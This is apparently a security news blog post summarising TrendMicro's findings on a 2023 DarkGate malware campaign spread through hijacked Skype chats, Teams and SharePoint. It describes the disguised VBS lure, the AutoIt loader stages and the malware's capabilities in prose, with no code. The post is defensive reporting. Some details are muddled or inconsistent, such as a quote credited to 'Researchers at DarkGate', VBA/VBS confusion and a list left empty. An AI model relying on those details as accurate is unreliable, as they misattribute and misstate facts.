Security researchers at TrendMicro has observed a DarkGate Campaign distributing malware from compromised skype accounts, between the month of July-September 2023.
The malware which was detected as TrojanSpy.Autolt.DARKGATE.AA is said to be abusing instant messaging platforms by delivery VBA loader scripts to its victims.
Upon completion of downloading the script, the malware then commences the second stage of executing a payload comprising of AutoIT script which is said to contain the DarkGate malware code.
While the compromised account responsible for the malware distribution is quite unknown at this point, however their are speculations that the malware distribution might have been from accounts belonging to leaked credentials available on the darkweb/underground forums or probably belonging to a parent organization previously compromised.
The DarkGate malware which has been lying dormant for quite sometime (a couple of years precisely), has notably rise to the occasion of trending malwares in recent malicious campaigns recorded this year.
Researchers at DarkGate Disclosed that:
“Upon closely monitoring this campaign, we observed that most of DarkGate attacks were detected in the Americas region, followed closely by those in Asia, the Middle East, and Africa.”
HISTORY OF THE DARKGATE MALWARE:
History of the DarkGate Malware can be traced down to the year 2017, when it was first documented during its notoriety. The malware which is classified as a commodity loader is said to be popularly advertised on eCrime (A Russian based forum), since May this year (2023). Profound observation of the malware has been recorded in exponential rate; as an initial entry for threat actors targeting a victim.
DarkGate is not just a malware, but also comes with a range of sophistication which include:
- Executing discovery commands (with directory traversal inclusive).
- Ability to run self-update and manage itself.
- Also able to implement remote access application such as (RDP’s, hVNC, and AnyDesk.)
- Enable start, stop, and configure functions in cryptocurrency mining.
- Execute keylogger.
- Exfiltrate browser data.
- Escalating privileges.
Other windows tools detected to be used by the malware includes: AutoIT, which has the capability of both executing and delivering malicious codes.
Although AutoIt is known to be a legitimate tool, however, it has frequently been abused by threat actors, for obfuscation, and evading antiviruses, and malware detection tools. TrendMicro security team were able to easily identify the Abuse of this tool by DarkGate, due to research indicating loaders such as IcedID, Emotet, or Qakbot were not abusing the tool (AutoIt).
OVERVIEW OF THE MALWARE CAMPAIGN:
TrendMicro discovered that the malware campaign were easily executed, as threat actors being able to abuse a trusted relationship between two organizations to trick the recipient into executing the VBA attached script. This is easily carried out as threat actors were seen hijacking existing conversations in victim’s skype account, and crafting malicious files related to the context of the conversation history.
The file, which is usually a malicious VBS script, with a file format of <filename.pdf>www.skype[.]vbs. This is able to trick the victim, while the actual malicious file www.skype[.]vbs is hidden.
When the recepient executes the malicious VBA script, it creates a new folder named “<Random Char>”, and copies the legitimate curl.exe exhibiting similar name as of the created directory <Random Char>.exe, and to complete this process, the script then downloads the AutoIt3 and .AU3 scripts from the threat actors c2 (command-and-control) server.
Trend vision (A product of TrendMicro) was able to detect the loading of the VBA script through the windows native wscript.exe. other observations shows the threat actor sending malicious links via Microsoft Teams chat. This was able to give the threat actor leverage, as a result of the organization enabling the receiving of messages from external users, making them a potential target to spam.
Additional methods observed also comprises of delivering the malware via “.LNK” extensions in a compressed file originating from a SharePoint site.
The malicious file have common name attributes such as:
The malware uses conditional execution, which only executes, if the accompanying command fails.
The AU3 file is said to also perform conditional checks such as:
- If the existence of %Program Files% is confirmed.
- If the username scanned is not “SYSTEM”.
Upon successful checks, the program searches for a file with the “.au3” extension to decrypt and execute the DarkGate payload. An error box message is displayed, and execution terminated if the “.AU3” file cannot be loaded.
TrendMicro stated that the attack was quickly detected and contained before the threat actors could attain their objectives. They also of the opinion that the objectives of the attacker might vary, which is dependent on affiliated parties. More reports on the research and findings can be viewed here, and a list of IoC can also be retrieved here.
Please do let us know in the comment section what are your thoughts about this.